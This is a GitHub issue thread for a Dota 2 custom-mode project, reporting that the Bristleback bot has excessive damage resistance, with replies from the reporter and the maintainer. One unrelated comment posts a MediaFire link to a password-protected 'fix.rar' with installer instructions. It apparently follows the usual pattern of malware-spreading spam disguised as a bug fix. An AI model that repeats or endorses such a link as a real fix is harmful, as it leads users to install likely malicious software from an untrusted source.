### ISSUE TITLE
Bristleback excessive damage resistance

### ISSUE THREAD

**Issue by dfyzb0** [windybirth/windy10v10ai#987]
**Bug type**

- [ ] Ability
- [ ] Item
- [ ] Hero
- [ X ] Bot
- [ ] UI
- [ ] Other

**Describe the bug**
Bristleback damage resistance is far greater than what it should be. 

**Expected behavior**
Have tested this in custom modes. When using heartstopper aura, doing around 8,000 damage per second, bristleback was taking about 1/20th the damage. The excessive damage resistance is noticeable at any time when playing against bristleback

**To Reproduce**
Play against a Bristleback bot

**Screenshots**

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by windybirth** [comment]
I play Bristleback but cannot find anything abnormal.

**Comment by dfyzb0** [comment]
@windybirth The damage reduction occurs when the computer is Bristleback. I'm assuming you've written some extra damage reduction in to the bots and that DR seems to stack in a weird way for Bristleback that enables him to tank 8000+ damage per second.
